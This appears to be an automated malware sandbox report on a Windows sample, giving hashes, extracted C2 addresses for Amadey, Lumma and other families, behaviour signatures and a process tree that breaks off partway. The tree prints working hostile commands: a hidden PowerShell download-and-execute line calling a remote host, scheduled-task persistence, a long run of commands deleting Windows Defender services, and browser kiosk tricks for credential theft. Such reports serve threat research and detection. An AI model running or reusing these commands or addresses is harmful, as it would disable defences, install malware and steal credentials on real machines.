Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/04/2025, 09:33

General

  • Target

    2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    13cefe1fe0ec8a50500e8077af765a55

  • SHA1

    9fc255b158387a4b0a68c55d302c72a650d25c92

  • SHA256

    f7ff070fae36f647e1f1e3f38c05af36c1d63bb77dcce832081667043eded7ed

  • SHA512

    532c43531f3d4b68a1c678e8e9dbf6571b38ce70fa3c28a614c68e26877d0f5b37c4743983454b25c8cda75e7ef9355ed73d70c86291281a938d7c406348c2a9

  • SSDEEP

    24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8a08u:XTvC/MTQYxsWR7a08

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rlxspoty.run/nogoaz

https://jrxsafer.top/shpaoz

https://zkrxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://targett.top/dsANGt

https://xrfxcaseq.live/gspaz

https://ywmedici.top/noagis

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://0scenarisacri.top/gHSAYuqo

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Contacts a large (2590) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 25 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 19 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn EkBgjma9waz /tr "mshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:212
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn EkBgjma9waz /tr "mshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1168
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\OqcW9KPBU.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Users\Admin\AppData\Local\Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE
          "C:\Users\Admin\AppData\Local\Temp9K1HSKWQKABH0THSTVA22AAFUTPAK4FR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4604
            • C:\Users\Admin\AppData\Local\Temp\10444930101\36c97fadf5.exe
              "C:\Users\Admin\AppData\Local\Temp\10444930101\36c97fadf5.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1032
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn M4UzAmay1nw /tr "mshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3948
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn M4UzAmay1nw /tr "mshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:876
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\XaGsFGEWM.hta
                7⤵
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:5524
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:6104
                  • C:\Users\Admin\AppData\Local\TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE
                    "C:\Users\Admin\AppData\Local\TempJXWR3GY9NFCSDEPRFXDF8UDMD8L0ZHFB.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2956
            • C:\Users\Admin\AppData\Local\Temp\10444940101\ddff17fe91.exe
              "C:\Users\Admin\AppData\Local\Temp\10444940101\ddff17fe91.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5588
            • C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5640
              • C:\Users\Admin\AppData\Local\Temp\262.exe
                "C:\Users\Admin\AppData\Local\Temp\262.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1504
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D774.tmp\D775.tmp\D776.bat C:\Users\Admin\AppData\Local\Temp\262.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5040
                  • C:\Users\Admin\AppData\Local\Temp\262.exe
                    "C:\Users\Admin\AppData\Local\Temp\262.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:5332
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D86E.tmp\D86F.tmp\D870.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2696
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:5008
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2256
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:5028
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:4992
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:5580
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:112
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:5060
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:5520
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:5540
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:4900
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:3568
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:1972
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:232
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3292
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:5572
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:632
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:5368
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:5252
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:2380
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:1212
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:4948
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                • Modifies security service
                                PID:3068
                              • C:\Windows\system32\sc.exe
                                sc stop "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:5984
                              • C:\Windows\system32\sc.exe
                                sc delete "SgrmBroker"
                                11⤵
                                • Launches sc.exe
                                PID:2704
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                11⤵
                                  PID:1812
                                • C:\Windows\system32\sc.exe
                                  sc stop "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:5748
                                • C:\Windows\system32\sc.exe
                                  sc delete "SecurityHealthService"
                                  11⤵
                                  • Launches sc.exe
                                  PID:4212
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                  11⤵
                                    PID:4152
                                  • C:\Windows\system32\sc.exe
                                    sc stop "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2536
                                  • C:\Windows\system32\sc.exe
                                    sc delete "webthreatdefsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5448
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                    11⤵
                                      PID:5768
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:412
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefusersvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:440
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                      11⤵
                                        PID:1708
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4788
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdNisDrv"
                                        11⤵
                                        • Launches sc.exe
                                        PID:5780
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                        11⤵
                                          PID:3980
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:3592
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdBoot"
                                          11⤵
                                          • Launches sc.exe
                                          PID:5712
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                          11⤵
                                            PID:2756
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:428
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdFilter"
                                            11⤵
                                            • Launches sc.exe
                                            PID:4848
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                            11⤵
                                              PID:4836
                                            • C:\Windows\system32\sc.exe
                                              sc stop "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:4328
                                            • C:\Windows\system32\sc.exe
                                              sc delete "SgrmAgent"
                                              11⤵
                                              • Launches sc.exe
                                              PID:2000
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                              11⤵
                                                PID:1336
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:5956
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecWfp"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1516
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                11⤵
                                                  PID:4540
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:2140
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecFlt"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:5904
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                  11⤵
                                                    PID:5548
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:544
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecCore"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:5788
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                    11⤵
                                                      PID:748
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                      11⤵
                                                        PID:1980
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                        11⤵
                                                          PID:3992
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                          11⤵
                                                            PID:3388
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                            11⤵
                                                              PID:5532
                                                            • C:\Windows\system32\sc.exe
                                                              sc stop ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:3948
                                                            • C:\Windows\system32\sc.exe
                                                              sc delete ddrver
                                                              11⤵
                                                              • Launches sc.exe
                                                              PID:4416
                                                  • C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:948
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10444960101\bf6856f4dd.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2572
                                                  • C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4760
                                                    • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10444970101\ca1bffd716.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2384
                                                  • C:\Users\Admin\AppData\Local\Temp\10444980101\72551f9bea.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10444980101\72551f9bea.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1896
                                                  • C:\Users\Admin\AppData\Local\Temp\10444990101\a594ddf458.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10444990101\a594ddf458.exe"
                                                    6⤵
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    PID:4328
                                                  • C:\Users\Admin\AppData\Local\Temp\10445000101\43f9a4e9b0.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10445000101\43f9a4e9b0.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:5340
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM firefox.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3344
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM chrome.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2352
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM msedge.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3408
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM opera.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1012
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /F /IM brave.exe /T
                                                      7⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4792
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                      7⤵
                                                        PID:4308
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                          8⤵
                                                          • Checks processor information in registry
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5916
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {4b67514f-f5b7-41dc-bbab-f25d9f0abfee} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                            9⤵
                                                              PID:4628
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {29ffa76f-610c-45f1-b008-76540756ed5e} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                              9⤵
                                                                PID:5952
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3816 -prefsLen 25164 -prefMapHandle 3820 -prefMapSize 270279 -jsInitHandle 3824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {44981415-6b03-47a2-ac75-e63f62346319} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                9⤵
                                                                • Checks processor information in registry
                                                                PID:5044
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3984 -prefsLen 27276 -prefMapHandle 3988 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {37c88acf-557d-484d-8c6b-eb4a9f9fdd96} -parentPid 5916 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5916" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                9⤵
                                                                  PID:5040
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
